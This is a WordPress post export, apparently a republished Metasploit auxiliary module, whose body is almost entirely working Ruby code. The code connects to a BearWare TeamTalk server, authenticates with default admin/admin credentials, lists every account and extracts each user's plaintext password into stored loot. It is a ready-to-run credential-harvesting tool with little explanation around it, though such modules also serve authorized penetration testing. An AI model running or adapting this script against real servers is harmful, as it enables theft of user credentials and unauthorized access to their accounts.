{"id":59304,"date":"2024-08-31T23:40:54","date_gmt":"2024-08-31T20:40:54","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180696\/teamtalk_creds.rb.txt"},"modified":"2024-08-31T23:40:54","modified_gmt":"2024-08-31T20:40:54","slug":"teamtalk-gather-credentials","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/teamtalk-gather-credentials\/","title":{"rendered":"TeamTalk Gather Credentials"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report<\/p>\n

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘TeamTalk Gather Credentials’,
‘Description’ => %q{
This module retrieves user credentials from BearWare TeamTalk.<\/p>\n

Valid administrator credentials are required.<\/p>\n

This module has been tested successfully on TeamTalk versions
5.2.2.4885 and 5.2.3.4893.
},
‘Author’ => ‘bcoles’,
‘References’ =>
[
# Protocol documentation
[‘URL’, ‘https:\/\/github.com\/BearWare\/TeamTalk5\/blob\/master\/ttphpadmin\/tt5admin.php’]],
‘License’ => MSF_LICENSE))
register_options [
Opt::RPORT(10333),
OptString.new(‘USERNAME’, [true, ‘The username for TeamTalk’, ‘admin’]),
OptString.new(‘PASSWORD’, [true, ‘The password for the specified username’, ‘admin’])
]end<\/p>\n

def run
vprint_status ‘Connecting…’<\/p>\n

connect
banner = sock.get_once<\/p>\n

unless banner =~ \/^teamtalk\\s.*protocol=”([\\d\\.]+)”\/
fail_with Failure::BadConfig, ‘TeamTalk does not appear to be running’
end<\/p>\n

print_status “Found TeamTalk (protocol version #{$1})”<\/p>\n

report_service :host => rhost,
:port => rport,
:proto => ‘tcp’,
:name => ‘teamtalk’<\/p>\n

vprint_status “Authenticating as ‘#{username}'”<\/p>\n

req = “login username=\\”#{username.tr(‘”‘, ‘\\”‘)}\\” password=\\”#{password.tr(‘”‘, ‘\\”‘)}\\””
res = send_command req<\/p>\n

unless res.to_s.starts_with? ‘accepted’
fail_with Failure::NoAccess, ‘Authentication failed’
end<\/p>\n

print_good ‘Authenticated successfully’<\/p>\n

if res =~ \/usertype=2\/
print_good ‘User is an administrator’
else
print_warning ‘User is not an administrator’
end<\/p>\n

vprint_status “Retrieving users…”<\/p>\n

res = send_command ‘listaccounts’<\/p>\n

if res =~ \/^error\/ && res =~ \/message=”Command not authorized”\/
print_error ‘Insufficient privileges’
return
end<\/p>\n

unless res =~ \/^ok\\r?\\n?\\z\/
print_error ‘Unexpected reply’
return
end<\/p>\n

cred_table = Rex::Text::Table.new ‘Header’ => ‘TeamTalk User Credentials’,
‘Indent’ => 1,
‘Columns’ => [‘Username’, ‘Password’, ‘Type’]\n

res.each_line do |line|
line.chomp!
next unless line =~ \/^useraccount\/<\/p>\n

user = line.scan(\/\\s+username=”(.*?)”\\s+password=\/).flatten.first.to_s.gsub(‘\\”‘, ‘”‘)
pass = line.scan(\/\\s+password=”(.*?)”\\s+usertype=\/).flatten.first.to_s.gsub(‘\\”‘, ‘”‘)
type = line.scan(\/\\s+usertype=(\\d+)\\s+\/).flatten.first<\/p>\n

cred_table << [ user, pass, type ]report_cred user: user,
password: pass,
type: type,
proof: line
end<\/p>\n

if cred_table.rows.empty?
print_error ‘Did not find any users’
return
end<\/p>\n

print_status “Found #{cred_table.rows.size} users”
print_line
print_line cred_table.to_s<\/p>\n

p = store_loot ‘teamtalk.user.creds’,
‘text\/csv’,
rhost,
cred_table.to_csv,
‘TeamTalk User Credentials’<\/p>\n

print_good “Credentials saved in: #{p}”
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
print_error e.message
ensure
disconnect
end<\/p>\n

private<\/p>\n

def username
datastore[‘USERNAME’] || ”
end<\/p>\n

def password
datastore[‘PASSWORD’] || ”
end<\/p>\n

def report_cred(opts)
service_data = {
address: rhost,
port: rport,
service_name: ‘teamtalk’,
protocol: ‘tcp’,
workspace_id: myworkspace_id
}<\/p>\n

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge service_data<\/p>\n

login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
access_level: opts[:type],
proof: opts[:proof]}.merge service_data<\/p>\n

create_credential_login login_data
end<\/p>\n

def send_command(cmd = ”)
cmd_id = rand(1000)
sock.put “#{cmd} id=#{cmd_id}\\n”<\/p>\n

res = ”
timeout = 15
Timeout.timeout(timeout) do
res << sock.get_once until res =~ \/^end id=#{cmd_id}\/
end<\/p>\n

res.to_s.scan(\/begin id=#{cmd_id}\\r?\\n(.*)\\r?\\nend id=#{cmd_id}\/m).flatten.first
rescue Timeout::Error
print_error “Timeout (#{timeout} seconds)”
rescue => e
print_error e.message
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::Tcpinclude Msf::Auxiliary::Report def initialize(info = {})super(update_info(info,‘Name’ => ‘TeamTalk Gather Credentials’,‘Description’ => %q{This module retrieves user credentials from BearWare TeamTalk. Valid administrator credentials are required. This module has been tested successfully on TeamTalk versions5.2.2.4885 and 5.2.3.4893.},‘Author’ => ‘bcoles’,‘References’ =>[# Protocol documentation[‘URL’, ‘https:\/\/github.com\/BearWare\/TeamTalk5\/blob\/master\/ttphpadmin\/tt5admin.php’]],‘License’ => …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59304","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59304","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59304"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59304\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59304"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59304"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59304"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}